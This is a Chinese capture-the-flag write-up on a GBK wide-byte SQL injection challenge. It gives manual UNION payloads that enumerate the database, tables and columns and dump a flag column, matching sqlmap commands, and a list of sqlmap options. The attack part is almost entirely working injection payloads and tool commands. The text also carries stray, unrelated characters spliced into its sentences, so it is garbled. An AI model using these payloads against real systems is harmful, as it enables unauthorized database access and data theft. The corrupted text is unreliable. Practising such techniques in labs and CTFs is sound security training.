題目:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
本題為寬字節(jié)注入,本文重點(diǎn)講解SQL注入相關(guān)方法港柜。
方法一:
1函喉、爆出數(shù)據(jù)庫(kù)
手工
id=%df%27%20union%20select%201,%20database()%23
工具
python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db
2锁保、爆出表
手工
id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23
工具
python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover --tables
3禁偎、爆出表的內(nèi)容
手工
id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23
ctf4進(jìn)行16進(jìn)制轉(zhuǎn)換
id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23
工具
sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 --columns
4杀怠、獲取列的內(nèi)容
手工
id=%df%27 union select 1,group_concat(flag) from ctf4%23
工具
sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 -C flag --dump
方法二:
sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --search -C flag
--level 3 --risk 1 --thread 10
方法三:
python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db
關(guān)注黃色標(biāo)注恕汇,打開此文件可得腕唧。
關(guān)于手工注入:
后續(xù)參考:
1、SQL備忘錄
2瘾英、SQL Injection
關(guān)于sqlmap注入:
-h 顯示基礎(chǔ)的幫助消息并退出
-hh 顯示高級(jí)的幫助消息并退出
-u 目標(biāo)url
--thread 10 最大為10
--level 3 最大為5
--risk 3 最大為3
-a 檢索所有
--current-db 檢索當(dāng)前數(shù)據(jù)庫(kù)
--tables 枚舉數(shù)據(jù)庫(kù)表名
--columns 枚舉數(shù)據(jù)庫(kù)列名
--dump 輸出數(shù)據(jù)庫(kù)表的數(shù)據(jù)
--search 查找特定的列名枣接,表名或數(shù)據(jù)庫(kù)名,配合-D,-C,-T
-D 指定數(shù)據(jù)庫(kù)名
-T 指定數(shù)據(jù)庫(kù)表名
-C 指定數(shù)據(jù)庫(kù)列名
--common-tables 檢測(cè)常見的表名
--common-columns 檢測(cè)常見的列名